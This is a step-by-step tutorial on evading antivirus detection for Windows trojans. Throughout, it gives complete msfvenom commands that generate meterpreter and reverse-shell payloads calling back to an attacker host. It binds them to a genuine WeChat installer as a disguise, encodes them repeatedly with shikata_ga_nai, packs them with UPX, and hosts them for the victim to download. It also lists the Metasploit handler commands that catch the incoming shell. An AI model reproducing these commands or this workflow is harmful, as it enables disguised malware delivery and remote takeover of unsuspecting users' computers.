How to Bypass Antivirus Detection with Metasploit and UPX: A Step‑by‑Step Guide

"Immune evasion" (免杀) refers to techniques that prevent antivirus or anti‑spyware programs from detecting malicious payloads, often by altering their signatures while preserving functionality.

1. Bare Trojan Attempt

This approach generates a trojan without any evasion processing.

Use msfvenom to create a Windows meterpreter payload named weixin.exe:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

Deploy Apache on Kali, place weixin.exe in /var/www/html, and let the target download it via http://192.168.111.132/weixin.exe. The file is flagged by AV.

Before delivery, test the file on VirusTotal, a free multi‑engine scanning service.

2. Metasploit Encoding

List available encoders with msfvenom -l encoders and choose a legitimate executable (e.g., the genuine WeChat installer) as a template for binding.

Generate a reverse‑shell trojan, bind it to WeChatSetup.exe, and encode it with x86/shikata_ga_nai twelve times:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

-e specifies the encoder. -x specifies the template executable. -i specifies the number of encoding iterations. -f specifies the output format; -o specifies the output path.

Place the resulting file on the Apache server, let the target download it, and start a Metasploit handler:

use exploit/multi/handler set payload windows/shell/reverse_tcp set LHOST 192.168.111.132 set LPORT 9999 run

3. UPX Packing

UPX can compress or pack an executable, altering its signature. Use it to pack the previously encoded trojan:

upx /root/WeChatSetup1.exe

Host the packed file on Apache and establish a listener as before; a successful session demonstrates that the payload evaded AV detection.

Conclusion

Antivirus vendors continuously develop detection for evasion techniques, so methods that work today may become ineffective later.